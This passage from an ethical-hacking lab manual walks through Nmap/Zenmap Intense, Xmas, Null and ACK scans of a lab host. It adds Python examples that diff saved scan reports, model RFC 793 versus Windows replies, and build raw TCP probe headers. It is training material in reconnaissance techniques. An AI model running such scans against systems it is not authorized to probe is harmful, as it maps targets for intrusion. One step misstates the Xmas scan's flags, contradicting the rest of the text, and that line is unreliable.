8. Nmap scans the provided IP address with Intense scan and displays the scan result below the Nmap Output tab.

Nmap accepts multiple host specifications on the command line, and they don't need to be of the same type.

Nmap Output tab (nmap -T4 -A -v 10.0.0.4), first part:
Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 15:35
Scanning 10.0.0.4 [1 port]
Completed ARP Ping Scan at 15:35, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:35
Completed Parallel DNS resolution of 1 host. at 15:35, 0.50s elapsed
Initiating SYN Stealth Scan at 15:35
Scanning 10.0.0.4 [1000 ports]
Discovered open port 135/tcp on 10.0.0.4
Discovered open port 139/tcp on 10.0.0.4
Discovered open port 445/tcp on 10.0.0.4
Increasing send delay for 10.0.0.4 from 0 to 5 due to 72 out of 179 dropped probes since last increase.
Discovered open port 49152/tcp on 10.0.0.4
Discovered open port 49154/tcp on 10.0.0.4
Discovered open port 49153/tcp on 10.0.0.4
Discovered open port 49156/tcp on 10.0.0.4
Discovered open port 49155/tcp on 10.0.0.4
Discovered open port 5357/tcp on 10.0.0.4

FIGURE 6.5: The Zenmap main window with the Nmap Output tab for Intense Scan

9. After the scan is complete, Nmap shows the scanned results.


The options available to control target selection:
■ -iL <inputfilename>
■ -iR <num hosts>
■ --exclude <host1>[,<host2>[,...]]
■ --excludefile <exclude_file>

Nmap Output tab, continued:
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:15:5D:00:07:10 (Microsoft)
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 or Windows Server 2008 SP1
Uptime guess: 0.256 days (since Fri Aug 24 09:27:40 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FIGURE 6.6: The Zenmap main window with the Nmap Output tab for Intense Scan

The following options control host discovery:
■ -sL (List Scan)
■ -sn (No port scan)
■ -Pn (No ping)
■ -PS<port list> (TCP SYN Ping)
■ -PA<port list> (TCP ACK Ping)
■ -PU<port list> (UDP Ping)
■ -PY<port list> (SCTP INIT Ping)
■ -PE; -PP; -PM (ICMP Ping Types)
■ -PO<protocol list> (IP Protocol Ping)
■ -PR (ARP Ping)
■ --traceroute (Trace path to host)
■ -n (No DNS resolution)
■ -R (DNS resolution for all targets)
■ --system-dns (Use system DNS resolver)
■ --dns-servers <server1>[,<server2>[,...]] (Servers to use for reverse DNS queries)

10. Click the Ports/Hosts tab to display more information on the scan results.
11. Nmap also displays the Port, Protocol, State, Service, and Version of the scan.

FIGURE 6.7: The Zenmap main window with the Ports/Hosts tab for Intense Scan (135, 139, 445, 5357 and 49152-49156/tcp open)
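The lab objectives ask you to record scan reports and compare saved results for suspicious ports. The script below is an added example, not part of the lab manual or of Nmap: it parses the PORT / STATE / SERVICE / VERSION table that Nmap prints (the same fields the Ports/Hosts tab lists) from two saved normal-output reports and reports which ports newly opened, stopped being open, or changed service or version. The two reports are constructed for this example and modelled on the Intense Scan of 10.0.0.4 above; the function names parse_nmap_report, diff_reports and unexpected_open are mine.

```python
"""Compare saved Nmap normal-output reports for new or unexpected open ports.

Added example (not from the lab manual or from Nmap). Parses the
"PORT STATE SERVICE VERSION" table Nmap prints for each host and diffs
two saved runs, the check the lab's "compare saved results for suspicious
ports" objective asks for.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

# Matches e.g. "5357/tcp  open  http  Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)".
# Longer state names come first so the alternation cannot stop at "open".
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp|sctp)\s+"
    r"(?P<state>open\|filtered|closed\|unfiltered|open|closed|filtered|unfiltered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.*\S))?\s*$"
)
HOST_LINE = re.compile(r"^Nmap scan report for (?P<host>\S+)")

PortKey = Tuple[str, int, str]  # (host, port, protocol)


@dataclass(frozen=True)
class PortRecord:
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str

    @property
    def key(self) -> PortKey:
        return (self.host, self.port, self.proto)


def parse_nmap_report(text: str) -> List[PortRecord]:
    """One record per port line, attributed to the host named in the preceding
    "Nmap scan report for" header. NSE script lines (starting with "|"), the
    column header and the summary lines do not match PORT_LINE and are skipped."""
    records: List[PortRecord] = []
    host = None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group("host")
            continue
        m = PORT_LINE.match(line)
        if m and host is not None:
            records.append(PortRecord(host, int(m["port"]), m["proto"], m["state"],
                                      m["service"], m["version"] or ""))
    return records


def diff_reports(old: Iterable[PortRecord],
                 new: Iterable[PortRecord]) -> Dict[str, List[PortKey]]:
    """Compare two parsed runs. Nmap normal output lists only the interesting
    (mostly open) ports, so a port that vanished from the table is treated as
    no longer open."""
    old_map = {r.key: r for r in old}
    new_map = {r.key: r for r in new}

    def is_open(table: Dict[PortKey, PortRecord], k: PortKey) -> bool:
        return k in table and table[k].state == "open"

    new_open = sorted(k for k in new_map if is_open(new_map, k) and not is_open(old_map, k))
    closed_since = sorted(k for k in old_map if is_open(old_map, k) and not is_open(new_map, k))
    changed = sorted(k for k in old_map.keys() & new_map.keys()
                     if (old_map[k].service, old_map[k].version)
                     != (new_map[k].service, new_map[k].version))
    return {"new_open": new_open, "closed_since": closed_since, "changed": changed}


def unexpected_open(records: Iterable[PortRecord], allowed: Set[int]) -> List[PortRecord]:
    """Open ports that are not on the allow-list of ports the host should expose."""
    return [r for r in records if r.state == "open" and r.port not in allowed]


# Constructed sample reports (not real captures), modelled on the lab's Intense
# Scan of 10.0.0.4. On the later run 139/tcp has gone and 3389/tcp has appeared.
BASELINE = """\
Nmap scan report for 10.0.0.4
Host is up (0.00050s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:15:5D:00:07:10 (Microsoft)
"""

LATER = """\
Nmap scan report for 10.0.0.4
Host is up (0.00048s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  netbios-ssn
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc         Microsoft Windows RPC
"""

EXPECTED_PORTS = {135, 139, 445, 5357, 49152}  # what the baseline documented


def main() -> None:
    old, new = parse_nmap_report(BASELINE), parse_nmap_report(LATER)
    for kind, keys in diff_reports(old, new).items():
        print(f"{kind:13s}: {keys}")
    for r in unexpected_open(new, EXPECTED_PORTS):
        print(f"review: {r.host}:{r.port}/{r.proto} {r.service} {r.version}")


if __name__ == "__main__":
    main()
```

Save each Zenmap run with Scan > Save Scan as normal output and feed the two files to parse_nmap_report instead of the constructed strings.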


12. Click the Topology tab to view Nmap's topology for the provided IP address in the Intense scan Profile.

By default, Nmap performs a host discovery and then a port scan against each host it determines to be online.

FIGURE 6.8: The Zenmap main window with Topology tab for Intense Scan

13. Click the Host Details tab to see the details of all hosts discovered during the intense scan profile.

By default, Nmap determines your DNS servers (for rDNS resolution) from your resolv.conf file (UNIX) or the Registry (Win32).

FIGURE 6.9: The Zenmap main window with Host Details tab for Intense Scan (Host Status: up, 9 open, 0 filtered, 991 closed, 1000 scanned ports, last boot Fri Aug 24 09:27:40 2012; Addresses: IPv4 10.0.0.4, IPv6 not available, MAC 00:15:5D:00:07:10; Operating System: Microsoft Windows 7 or Windows Server 2008 SP1)


14. Click the Scans tab to see the scan details for the provided IP addresses.

Nmap offers options for specifying which ports are scanned and whether the scan order is randomized or sequential.

In Nmap, option -p <port ranges> means scan only specified ports.

FIGURE 6.10: The Zenmap main window with Scans tab for Intense Scan

15. Now, click the Services tab located in the right pane of the window. This tab displays the list of services.
16. Click the http service to list all the HTTP Hostnames/IP addresses, Ports, and their states (Open/Closed).

In Nmap, option -F means fast (limited port) scan.

FIGURE 6.11: The Zenmap main window with Services option for Intense Scan


17. Click the msrpc service to list all the Microsoft Windows RPC services.

In Nmap, option --port-ratio <ratio><decimal number between 0 and 1> means scan all ports in the nmap-services file with a ratio greater than the one given. <ratio> must be between 0.0 and 1.1.

FIGURE 6.12: The Zenmap main window with msrpc Service for Intense Scan

18. Click the netbios-ssn service to list all NetBIOS hostnames.

In Nmap, option -r means don't randomize ports.

FIGURE 6.13: The Zenmap main window with netbios-ssn Service for Intense Scan

TASK 2: Xmas Scan

19. Xmas scan sends a TCP frame to a remote device with URG, ACK, RST, SYN, and FIN flags set. FIN scans work only against TCP/IP stacks developed according to RFC 793. The current version of Microsoft Windows is not supported.

Xmas scan (-sX) sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

20. Now, to perform a Xmas Scan, you need to create a new profile. Click Profile -> New Profile or Command Ctrl+P
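Step 19 and the sidebar say the Xmas scan only tells open from closed ports on TCP/IP stacks built to RFC 793, and not on Windows. The model below is an added example, not from the lab manual or from Nmap: it encodes RFC 793's handling of a segment arriving at a CLOSED or LISTEN port, a Windows-like stack that answers such a probe with RST regardless of port state, and the label Nmap attaches to each outcome. The function names and the sample host are mine.

```python
"""Why a Xmas scan (-sX) gets different answers from RFC 793 stacks and Windows.

Added example (not from the lab manual or from Nmap). It models the
"SEGMENT ARRIVES" rules of RFC 793 for a port in the CLOSED and LISTEN
states, the behaviour of stacks such as Microsoft Windows that answer every
such probe with RST, and the state Nmap reports for each outcome.
"""
from typing import Callable, Dict, FrozenSet, Optional

TCP_FLAGS = frozenset({"FIN", "SYN", "RST", "PSH", "ACK", "URG"})
XMAS_PROBE = frozenset({"FIN", "PSH", "URG"})   # what -sX sets
FIN_PROBE = frozenset({"FIN"})                   # -sF
NULL_PROBE: FrozenSet[str] = frozenset()         # -sN sets no flags at all

Stack = Callable[[str, FrozenSet[str]], Optional[str]]


def rfc793_response(port_state: str, flags: FrozenSet[str]) -> Optional[str]:
    """Reply of an RFC 793-compliant stack: "RST", "SYN-ACK", or None (dropped).

    port_state is "closed" (nothing listening) or "listen" (service is open).
    """
    if flags - TCP_FLAGS:
        raise ValueError(f"unknown TCP flags: {sorted(flags - TCP_FLAGS)}")
    if port_state == "closed":
        # CLOSED: every incoming segment that is not itself a RST gets a RST.
        return None if "RST" in flags else "RST"
    if port_state == "listen":
        # LISTEN: a RST is ignored, a bare ACK is answered with RST, a SYN starts
        # the handshake, and anything else (FIN/PSH/URG only) is dropped silently.
        if "RST" in flags:
            return None
        if "ACK" in flags:
            return "RST"
        if "SYN" in flags:
            return "SYN-ACK"
        return None
    raise ValueError(f"unknown port state: {port_state}")


def windows_like_response(port_state: str, flags: FrozenSet[str]) -> Optional[str]:
    """Stacks that depart from RFC 793 here (the lab names Microsoft Windows)
    send RST to a probe carrying neither SYN nor ACK whether or not the port
    is open, so only a proper SYN distinguishes open from closed."""
    if "SYN" in flags and not (flags & {"ACK", "RST"}):
        return "SYN-ACK" if port_state == "listen" else "RST"
    return None if "RST" in flags else "RST"


def nmap_label(response: Optional[str]) -> str:
    """Port state Nmap reports: silence after a FIN/NULL/Xmas probe is
    open|filtered (open, or a firewall dropped the probe), RST is closed,
    and a SYN-ACK (possible only for a SYN probe) is open."""
    if response is None:
        return "open|filtered"
    if response == "RST":
        return "closed"
    return "open"


def scan_view(stack: Stack, ports: Dict[int, str],
              probe: FrozenSet[str] = XMAS_PROBE) -> Dict[int, str]:
    """Send one probe to every port of a simulated host; return Nmap's view."""
    return {port: nmap_label(stack(state, probe)) for port, state in ports.items()}


def is_xmas_probe(flags: FrozenSet[str]) -> bool:
    """FIN+PSH+URG without SYN or ACK never occurs in a legitimate session,
    which is why an IDS can match this exact flag set as a scan indicator."""
    return flags == XMAS_PROBE


# Constructed host: the first three open ports from the lab's Intense Scan
# plus two ports with nothing listening.
SAMPLE_HOST = {135: "listen", 139: "listen", 445: "listen", 22: "closed", 80: "closed"}

if __name__ == "__main__":
    print("RFC 793 stack:", scan_view(rfc793_response, SAMPLE_HOST))
    print("Windows-like :", scan_view(windows_like_response, SAMPLE_HOST))
    print("SYN probe    :", scan_view(windows_like_response, SAMPLE_HOST, frozenset({"SYN"})))
```

Against the Windows-like stack every port comes back "closed" for the Xmas probe, which is the "not supported" result the lab warns about; the SYN probe still separates the listening ports.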

The option --max-retries <numtries> specifies the maximum number of port scan probe retransmissions.

21. On the Profile tab, enter Xmas Scan in the Profile name text field.

The description is a full description of what the scan does, which may be long.

The option --host-timeout <time> gives up on slow target hosts.

FIGURE 6.15: The Zenmap Profile Editor window with the Profile tab

C E H Lab M anual Page 130 E th ic a l H ackin g and Counterm easures Copyright © by E C ‫־‬Counc11
A ll Rights Reserved. Reproduction is Strictly Prohibited
M o d u le 0 3 - S c a n n in g N e tw o rk s

22. Click the Scan tab, and select Xmas Tree scan (-sX) from the TCP scan: drop-down list. The same list offers ACK scan (-sA), FIN scan (-sF), Maimon scan (-sM), Null scan (-sN), TCP SYN scan (-sS), TCP connect scan (-sT), Window scan (-sW), and Idle scan (-sI).

Note: UDP scan is activated with the -sU option. It can be combined with a TCP scan type such as SYN scan (-sS) to check both protocols during the same run.

Note: Enable all advanced/aggressive options (-A) turns on OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute).

Note: Nmap detects rate limiting and slows down accordingly to avoid flooding the network with useless packets that the target machine drops.

FIGURE 6.16: The Zenmap Profile Editor window with the Scan tab

23. Select None in the Non-TCP scans: drop-down list and Aggressive (-T4) in the Timing template: list, then click Save Changes. The command line at the top of the editor becomes nmap -sX -T4 -A -v 10.0.0.4.
    Profile Editor (command: nmap -sX -T4 -A -v 10.0.0.4)
    TCP scan: Xmas Tree scan (-sX)
    Non-TCP scans: None
    Timing template: Aggressive (-T4)
    [x] Enable all advanced/aggressive options (-A)

Note: You can speed up your UDP scans by scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using --host-timeout to skip slow hosts.

FIGURE 6.17: The Zenmap Profile Editor window with the Scan tab

24. Enter the IP address in the Target: field, select the Xmas Scan option from the Profile: field, and click Scan.
    Target: 10.0.0.4    Profile: Xmas Scan    Command: nmap -sX -T4 -A -v 10.0.0.4

Note: In Nmap, option -sY (SCTP INIT scan) is often referred to as half-open scanning, because you don't open a full SCTP association. You send an INIT chunk, as if you were going to open a real association, and then wait for a response.

FIGURE 6.18: The Zenmap main window with Target and Profile entered
25. Nmap scans the target IP address provided and displays results on the Nmap Output tab.

Note: When scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits results in a returned RST if the port is closed, and no response at all if the port is open.

Note: The option -sA (TCP ACK scan) is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.

    nmap -sX -T4 -A -v 10.0.0.4

    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
    NSE: Loaded 93 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 16:29
    Scanning 10.0.0.4 [1 port]
    Completed ARP Ping Scan at 16:29, 0.15s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 16:29
    Completed Parallel DNS resolution of 1 host. at 16:29, 0.00s elapsed
    Initiating XMAS Scan at 16:29
    Scanning 10.0.0.4 [1000 ports]
    Increasing send delay for 10.0.0.4 from 0 to 5 due to 34 out of 84 dropped probes since last increase.
    Completed XMAS Scan at 16:30, 8.36s elapsed (1000 total ports)
    Initiating Service scan at 16:30
    Initiating OS detection (try #1) against 10.0.0.4
    NSE: Script scanning 10.0.0.4.
    Initiating NSE at 16:30
    Completed NSE at 16:30, 0.00s elapsed
    Nmap scan report for 10.0.0.4
    Host is up (0.00020s latency).

FIGURE 6.19: The Zenmap main window with the Nmap Output tab
26. Click the Services tab in the left pane. It lists all the services found on that host.
    Target: 10.0.0.4    Profile: Xmas Scan    Command: nmap -sX -T4 -A -v 10.0.0.4
    (Same Nmap output as in Figure 6.19, shown with the Services tab selected.)

FIGURE 6.20: Zenmap main window with Services tab
TASK 3: Null Scan

27. A Null scan, like the Xmas scan, works only if the target's TCP/IP implementation follows RFC 793. In a Null scan, the attacker sends a TCP segment to the remote host with no flags set; a closed port answers with RST, while an open port stays silent, so Nmap reports it as open|filtered.

28. To perform a Null scan for a target IP address, create a new profile. Click Profile -> New Profile or Command (Ctrl+P).

Note: The option Null Scan (-sN) does not set any bits (the TCP flag header is 0).

Note: The option -sZ (SCTP COOKIE ECHO scan) is a more advanced SCTP scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports but send an ABORT if the port is closed.

FIGURE 6.21: The Zenmap main window with the New Profile or Command option
29. On the Profile tab, input the profile name Null Scan in the Profile name text field. (As the editor's help text says, this is how the profile will be identified in the drop-down combo box on the scan tab.)

Note: The option -sI <zombie host>[:<probeport>] (idle scan) is an advanced scan method that allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target.

FIGURE 6.22: The Zenmap Profile Editor with the Profile tab
30. Click the Scan tab in the Profile Editor window. Now select the Null scan (-sN) option from the TCP scan: drop-down list.

Note: The option -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server, and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so most servers have ceased supporting it.

Note: The option -r (Don't randomize ports): By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead.

FIGURE 6.23: The Zenmap Profile Editor with the Scan tab

31. Select None from the Non-TCP scans: drop-down field and select Aggressive (-T4) from the Timing template: drop-down field.

32. Click Save Changes to save the newly created profile.
    Profile Editor
    TCP scan: Null scan (-sN)
    Non-TCP scans: None
    Timing template: Aggressive (-T4)
    [x] Enable all advanced/aggressive options (-A)

Note: In Nmap, option --version-all (Try every single probe) is an alias for --version-intensity 9, ensuring that every single probe is attempted against each port.

Note: The option --top-ports <n> scans the <n> highest-ratio ports found in the nmap-services file. <n> must be 1 or greater.

FIGURE 6.24: The Zenmap Profile Editor with the Scan tab

33. In the main window of Zenmap, enter the target IP address to scan, select the Null Scan profile from the Profile drop-down list, and then click Scan.

    Target: 10.0.0.4    Profile: Null Scan    Command: nmap -sN -T4 -A -v 10.0.0.4

Note: The option -sR (RPC scan) works in conjunction with the various port scan methods of Nmap. It takes all the TCP/UDP ports found open and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up. In current Nmap releases -sR is an alias for -sV, and RPC probing happens as part of version detection.

FIGURE 6.25: The Zenmap main window with Target and Profile entered

34. Nmap scans the target IP address provided and displays results in the Nmap Output tab.
    Target: 10.0.0.4    Profile: Null Scan    Command: nmap -sN -T4 -A -v 10.0.0.4

    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
    NSE: Loaded 93 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating ARP Ping Scan at 16:47
    Scanning 10.0.0.4 [1 port]
    Completed ARP Ping Scan at 16:47, 0.14s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 16:47
    Completed Parallel DNS resolution of 1 host. at 16:47, 0.28s elapsed
    Initiating NULL Scan at 16:47
    Scanning 10.0.0.4 [1000 ports]
    Increasing send delay for 10.0.0.4 from 0 to 5 due to 68 out of 169 dropped probes since last increase.
    Completed NULL Scan at 16:47, 7.78s elapsed (1000 total ports)
    Initiating Service scan at 16:47
    Initiating OS detection (try #1) against 10.0.0.4
    NSE: Script scanning 10.0.0.4.
    Initiating NSE at 16:47
    Completed NSE at 16:47, 0.00s elapsed
    Nmap scan report for 10.0.0.4
    Host is up (0.000068s latency).

Note: The option --version-trace (Trace version scan activity) causes Nmap to print out extensive debugging info about what version scanning is doing. It is a subset of what you get with --packet-trace.

FIGURE 6.26: The Zenmap main window with the Nmap Output tab
35. Click the Host Details tab to view the details of the host, such as Host Status, Addresses, Open Ports, and Closed Ports. Against this Windows target all 1000 scanned ports are reported closed, which is exactly the RFC 793 non-compliance described in step 27: the Null scan tells you nothing about which ports are actually listening.

    Host Status
      State: up
      Open ports: 0
      Filtered ports: 0
      Closed ports: 1000
      Scanned ports: 1000
      Up time: Not available
      Last boot: Not available
    Addresses
      IPv4: 10.0.0.4
      IPv6: Not available
      MAC: 00:15:5D:00:07:10

FIGURE 6.27: The Zenmap main window with the Host Details tab
TASK 4: ACK Flag Scan

36. The attacker sends an ACK probe packet with a random sequence number. No response (or an ICMP unreachable error) means the port is filtered; an RST response means the port is unfiltered. An ACK scan never tells you whether a port is open or closed, only whether a stateful firewall sits between you and it.
37. To perform an ACK Flag Scan for a target IP address, create a new profile. Click Profile -> New Profile or Command (Ctrl+P).
Note: The --script-updatedb option updates the script database found in scripts/script.db, which is used by Nmap to determine the available default scripts and categories. It is necessary to update the database only if you have added or removed NSE scripts from the default scripts directory or if you have changed the categories of any script. This option is generally used by itself: nmap --script-updatedb.

FIGURE 6.28: The Zenmap main window with the New Profile or Command option
38. On the Profile tab, input ACK Flag Scan in the Profile name text field.

Note: The options --min-parallelism <numprobes> and --max-parallelism <numprobes> (Adjust probe parallelization) control the total number of probes that may be outstanding for a host group. They are used for port scanning and host discovery. By default, Nmap calculates an ever-changing ideal parallelism based on network performance.

FIGURE 6.29: The Zenmap Profile Editor window with the Profile tab
39. To select the parameters for an ACK scan, click the Scan tab in the Profile Editor window, select ACK scan (-sA) from the TCP scan: drop-down list, set Non-TCP scans: and Timing template: to None, leave the aggressive options unchecked, and leave the Targets: field empty.
    Profile Editor
    TCP scan: ACK scan (-sA)
    Non-TCP scans: None
    Timing template: None

Note: The options --min-rtt-timeout <time>, --max-rtt-timeout <time>, and --initial-rtt-timeout <time> (Adjust probe timeouts): Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes.

FIGURE 6.30: The Zenmap Profile Editor window with the Scan tab
40. Now click the Ping tab, check IPProto probes (-PO) to probe the IP address, and then click Save Changes. Note that -PO is the letter O (IP protocol ping), not the digit zero; the old -P0 meant "don't ping" and has been replaced by -Pn. The Ping tab also offers Don't ping before scanning (-Pn), ICMP ping (-PE), ICMP timestamp request (-PP), ICMP netmask request (-PM), ACK ping (-PA), SYN ping (-PS), UDP probes (-PU), and SCTP INIT ping probes (-PY).

Note: The option --max-retries <numtries> (Specify the maximum number of port scan probe retransmissions): When Nmap receives no response to a port scan probe, it can mean the port is filtered. Or maybe the probe or response was simply lost on the network.

FIGURE 6.31: The Zenmap Profile Editor window with the Ping tab
41. In the Zenmap main window, input the IP address of the target machine (in this lab: 10.0.0.4), select ACK Flag Scan from the Profile: drop-down list, and then click Scan.
    Target: 10.0.0.4    Profile: ACK Flag Scan    Command: nmap -sA -PO 10.0.0.4

Note: The option --host-timeout <time> (Give up on slow target hosts): Some hosts simply take a long time to scan. This may be due to poorly performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time.

FIGURE 6.32: The Zenmap main window with the Target and Profile entered
42. Nmap scans the target IP address provided and displays results on the Nmap Output tab.
    nmap -sA -PO 10.0.0.4

    Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24 17:03 India Standard Time
    Nmap scan report for 10.0.0.4
    Host is up (0.0000030s latency).
    All 1000 scanned ports on 10.0.0.4 are unfiltered
    MAC Address: 00:15:5D:00:07:10 (Microsoft)

    Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds

Note: The options --scan-delay <time> and --max-scan-delay <time> (Adjust delay between probes) cause Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting.

FIGURE 6.33: The Zenmap main window with the Nmap Output tab
43. To view more details regarding the host, click the Host Details tab.
    Target: 10.0.0.4    Profile: ACK Flag Scan    Command: nmap -sA -PO 10.0.0.4

Note: The options --min-rate <number> and --max-rate <number> (Directly control the scanning rate): Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time.

    Host Status
      State: up
      Open ports / Filtered ports / Closed ports: (all 1000 ports were reported unfiltered)
      Scanned ports: 1000
      Up time: Not available
      Last boot: Not available
    Addresses
      IPv4: 10.0.0.4
      IPv6: Not available
      MAC: 00:15:5D:00:07:10

FIGURE 6.34: The Zenmap main window with the Host Details tab
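The following is an added example; it is not code from the lab manual or from the Nmap project. It shows, in Python, what the Xmas, Null, and ACK probes used in Tasks 2 to 4 look like on the wire (the flag bits in byte 13 of the TCP header, with a valid checksum) and how Nmap turns the reply into a port state. The two reply functions are constructed models of a target stack (one following RFC 793, one behaving like Windows), not captured traffic; they reproduce why Figure 6.27 reports all 1000 ports closed and Figure 6.33 reports all 1000 ports unfiltered. Sending the built segment would need a raw socket and is deliberately not done here.

```python
import struct
import ipaddress

# TCP flag bits, byte 13 of the TCP header (RFC 793).
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

# Flag sets sent by the Nmap scan types used in this lab (the keys are our own labels).
PROBE_FLAGS = {
    "xmas": ("FIN", "PSH", "URG"),  # -sX
    "null": (),                      # -sN: no flags at all
    "fin":  ("FIN",),                # -sF
    "ack":  ("ACK",),                # -sA
}


def tcp_flags(names):
    """OR the named flags into the 6-bit flag field."""
    bits = 0
    for name in names:
        bits |= FLAG_BITS[name]
    return bits


def _ones_complement_sum(data):
    """16-bit one's-complement sum used by the Internet checksum (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src_ip, dst_ip, segment):
    """Checksum over the IPv4 pseudo-header (src, dst, zero, proto 6, length) plus the segment."""
    pseudo = (ipaddress.IPv4Address(src_ip).packed
              + ipaddress.IPv4Address(dst_ip).packed
              + struct.pack("!BBH", 0, 6, len(segment)))
    return (~_ones_complement_sum(pseudo + segment)) & 0xFFFF


def build_tcp_segment(src_ip, dst_ip, src_port, dst_port, flag_names, seq=0, window=1024):
    """Raw 20-byte TCP header (no options) with the given flags and a correct checksum."""
    offset_and_flags = (5 << 12) | tcp_flags(flag_names)   # data offset = 5 words
    header = struct.pack("!HHIIHHHH", src_port, dst_port, seq, 0,
                         offset_and_flags, window, 0, 0)    # checksum field zero for now
    csum = tcp_checksum(src_ip, dst_ip, header)
    return header[:16] + struct.pack("!H", csum) + header[18:]


def checksum_valid(src_ip, dst_ip, segment):
    """A correctly checksummed segment sums to zero once the checksum field is included."""
    return tcp_checksum(src_ip, dst_ip, segment) == 0


def flags_of(segment):
    """Extract the 6 flag bits from a raw TCP header."""
    return struct.unpack("!H", segment[12:14])[0] & 0x3F


# How Nmap reads the reply. response is None, "RST", "SYN-ACK" or "ICMP-UNREACH".
def classify(probe, response):
    if probe in ("xmas", "null", "fin"):          # inverse scans
        if response is None:
            return "open|filtered"                # silence: open port, or a firewall ate the probe
        if response == "RST":
            return "closed"
        return "filtered"                         # ICMP type 3, code 1, 2, 3, 9, 10 or 13
    if probe == "ack":
        return "unfiltered" if response == "RST" else "filtered"
    raise ValueError("unknown probe type: %s" % probe)


# Two constructed target models (not captured traffic).
def rfc793_reply(port_open, flags):
    """Stack that follows RFC 793 for a segment arriving in CLOSED or LISTEN state."""
    if flags & FLAG_BITS["RST"]:
        return None                               # RSTs are never answered
    if not port_open:
        return "RST"                              # CLOSED: anything without RST gets RST
    if flags & FLAG_BITS["ACK"]:
        return "RST"                              # LISTEN: unexpected ACK gets RST
    if flags & FLAG_BITS["SYN"]:
        return "SYN-ACK"                          # LISTEN: SYN starts the handshake
    return None                                   # LISTEN: FIN/PSH/URG/no flags are dropped


def windows_reply(port_open, flags):
    """Microsoft stack: RST to every non-SYN probe, whatever the port state."""
    if flags & FLAG_BITS["RST"]:
        return None
    if flags & FLAG_BITS["SYN"] and not flags & FLAG_BITS["ACK"]:
        return "SYN-ACK" if port_open else "RST"
    return "RST"


def scan(probe, ports, reply_fn):
    """ports: {port: is_open}. Returns {port: nmap_state} for one scan type."""
    flags = tcp_flags(PROBE_FLAGS[probe])
    return {port: classify(probe, reply_fn(is_open, flags)) for port, is_open in ports.items()}


if __name__ == "__main__":
    sample = {135: True, 139: True, 445: True, 80: False}    # constructed port table
    for name, stack in (("RFC 793 stack", rfc793_reply), ("Windows stack", windows_reply)):
        for probe in ("xmas", "null", "ack"):
            print(name, probe, scan(probe, sample, stack))
```

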